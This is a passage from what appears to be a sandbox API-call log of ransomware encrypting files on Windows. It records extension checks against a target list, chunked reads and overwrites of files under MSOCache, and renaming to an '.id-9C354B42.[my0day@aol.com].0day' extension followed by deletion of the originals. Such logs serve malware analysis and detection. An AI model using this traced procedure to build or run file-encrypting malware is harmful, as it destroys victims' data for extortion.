Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.246] lstrlenW (lpString=".doc") returned 4 [0048.246] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.246] lstrlenW (lpString=".docx") returned 5 [0048.246] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0048.246] lstrlenW (lpString=".pdf") returned 4 [0048.246] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.246] lstrlenW (lpString=".xls") returned 4 [0048.246] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.246] lstrlenW (lpString=".xlsx") returned 5 [0048.246] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0048.246] lstrlenW (lpString=".ppt") returned 4 [0048.246] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.246] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.246] lstrlenW (lpString=".zip") returned 4 [0048.246] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.246] lstrlenW (lpString=".rar") returned 4 [0048.246] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.246] lstrlenW (lpString=".bz2") returned 4 [0048.246] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.246] lstrlenW (lpString=".7z") returned 3 [0048.246] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.246] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.246] lstrlenW (lpString=".dbf") returned 4 [0048.246] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.247] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.247] lstrlenW (lpString=".1cd") returned 4 [0048.247] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.247] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.247] lstrlenW (lpString=".jpg") returned 4 [0048.247] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.247] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0048.247] lstrlenW (lpString="ose.exe") returned 7 [0048.247] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.252] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=174440) returned 1 [0048.252] CloseHandle (hObject=0x210) returned 1 [0048.252] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0048.253] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0048.253] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.253] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.253] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.253] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0048.253] GetLastError () returned 0x0 [0048.253] ReadFile (in: hFile=0x210, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x2a968, lpOverlapped=0x0) returned 1 [0048.265] WriteFile (in: hFile=0x1a8, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0048.268] ReadFile (in: hFile=0x210, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.268] WriteFile (in: hFile=0x1a8, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xe2, lpOverlapped=0x0) returned 1 [0048.268] SetEndOfFile (hFile=0x1a8) returned 1 [0048.268] CloseHandle (hObject=0x1a8) returned 1 [0048.268] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.268] SetEndOfFile (hFile=0x210) returned 1 [0048.269] CloseHandle (hObject=0x210) returned 1 [0048.270] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0048.270] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0048.270] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.270] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.270] lstrlenW (lpString=".doc") returned 4 [0048.270] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.270] lstrlenW (lpString=".docx") returned 5 [0048.270] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0048.270] lstrlenW (lpString=".pdf") returned 4 [0048.270] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.270] lstrlenW (lpString=".xls") returned 4 [0048.270] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.270] lstrlenW (lpString=".xlsx") returned 5 [0048.270] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0048.270] lstrlenW (lpString=".ppt") returned 4 [0048.270] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.270] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.270] lstrlenW (lpString=".zip") returned 4 [0048.270] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.270] lstrlenW (lpString=".rar") returned 4 [0048.270] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.270] lstrlenW (lpString=".bz2") returned 4 [0048.270] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.270] lstrlenW (lpString=".7z") returned 3 [0048.270] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.271] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.271] lstrlenW (lpString=".dbf") returned 4 [0048.271] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.271] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.271] lstrlenW (lpString=".1cd") returned 4 [0048.271] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.271] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.271] lstrlenW (lpString=".jpg") returned 4 [0048.271] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.271] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.271] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.271] lstrlenW (lpString=".doc") returned 4 [0048.271] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.271] lstrlenW (lpString=".docx") returned 5 [0048.271] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0048.271] lstrlenW (lpString=".pdf") returned 4 [0048.271] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.271] lstrlenW (lpString=".xls") returned 4 [0048.271] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.271] lstrlenW (lpString=".xlsx") returned 5 [0048.271] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0048.271] lstrlenW (lpString=".ppt") returned 4 [0048.271] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.271] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.271] lstrlenW (lpString=".zip") returned 4 [0048.271] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.271] lstrlenW (lpString=".rar") returned 4 [0048.271] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.271] lstrlenW (lpString=".bz2") returned 4 [0048.271] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.271] lstrlenW (lpString=".7z") returned 3 [0048.271] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.271] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.272] lstrlenW (lpString=".dbf") returned 4 [0048.272] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.272] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.272] lstrlenW (lpString=".1cd") returned 4 [0048.272] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.272] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.272] lstrlenW (lpString=".jpg") returned 4 [0048.272] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.272] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0048.272] lstrlenW (lpString="osetup.dll") returned 10 [0048.272] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.272] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=7378792) returned 1 [0048.272] CloseHandle (hObject=0x210) returned 1 [0048.272] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0048.272] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0048.272] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0048.399] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.399] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0x0) returned 1 [0048.399] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.399] ReadFile (in: hFile=0x210, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c80058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.401] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.401] ReadFile (in: hFile=0x210, lpBuffer=0x3cc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3cc0058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.406] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.406] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.406] ReadFile (in: hFile=0x210, lpBuffer=0x3d00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3d00058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.512] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.512] WriteFile (in: hFile=0x210, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x34bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0048.526] SetEndOfFile (hFile=0x210) returned 1 [0048.526] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ee2070 [0048.730] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.782] WriteFile (in: hFile=0x210, lpBuffer=0x3ee2070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ee2070*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.783] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.783] WriteFile (in: hFile=0x210, lpBuffer=0x3ee2070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ee2070*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.785] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.785] WriteFile (in: hFile=0x210, lpBuffer=0x3ee2070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ee2070*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.786] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ee2070 | out: hHeap=0x5f0000) returned 1 [0048.786] CloseHandle (hObject=0x210) returned 1 [0049.153] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0049.171] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.171] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.173] lstrlenW (lpString=".doc") returned 4 [0049.174] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.174] lstrlenW (lpString=".docx") returned 5 [0049.174] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0049.175] lstrlenW (lpString=".pdf") returned 4 [0049.176] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.177] lstrlenW (lpString=".xls") returned 4 [0049.178] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.179] lstrlenW (lpString=".xlsx") returned 5 [0049.180] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0049.180] lstrlenW (lpString=".ppt") returned 4 [0049.180] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.180] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.182] lstrlenW (lpString=".zip") returned 4 [0049.184] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0049.184] lstrlenW (lpString=".rar") returned 4 [0049.184] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0049.186] lstrlenW (lpString=".bz2") returned 4 [0049.187] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0049.187] lstrlenW (lpString=".7z") returned 3 [0049.188] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0049.188] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.188] lstrlenW (lpString=".dbf") returned 4 [0049.190] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0049.190] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.190] lstrlenW (lpString=".1cd") returned 4 [0049.190] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0049.191] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.193] lstrlenW (lpString=".jpg") returned 4 [0049.194] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.196] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.196] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.197] lstrlenW (lpString=".doc") returned 4 [0049.197] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.198] lstrlenW (lpString=".docx") returned 5 [0049.198] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0049.200] lstrlenW (lpString=".pdf") returned 4 [0049.200] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.202] lstrlenW (lpString=".xls") returned 4 [0049.205] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.205] lstrlenW (lpString=".xlsx") returned 5 [0049.205] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0049.206] lstrlenW (lpString=".ppt") returned 4 [0049.208] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.209] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.209] lstrlenW (lpString=".zip") returned 4 [0049.209] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0049.210] lstrlenW (lpString=".rar") returned 4 [0049.212] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0049.212] lstrlenW (lpString=".bz2") returned 4 [0049.213] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0049.214] lstrlenW (lpString=".7z") returned 3 [0049.214] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0049.215] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.215] lstrlenW (lpString=".dbf") returned 4 [0049.216] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0049.217] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.218] lstrlenW (lpString=".1cd") returned 4 [0049.218] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0049.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.221] lstrlenW (lpString=".jpg") returned 4 [0049.221] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.224] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0049.225] lstrlenW (lpString="VisiorWW.msi") returned 12 [0049.225] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0049.970] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=12060672) returned 1 [0049.970] CloseHandle (hObject=0x20c) returned 1 [0049.971] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi")) returned 0x2020 [0049.971] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0049.971] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0049.971] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0049.971] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0x0) returned 1 [0049.971] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0049.971] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c80058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.975] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0049.975] ReadFile (in: hFile=0x20c, lpBuffer=0x3cc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3cc0058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.987] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0049.987] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0049.987] ReadFile (in: hFile=0x20c, lpBuffer=0x3d00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3d00058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.004] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.004] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x34bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0050.130] SetEndOfFile (hFile=0x20c) returned 1 [0050.131] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ee2070 [0050.131] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.131] WriteFile (in: hFile=0x20c, lpBuffer=0x3ee2070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ee2070*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.132] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: 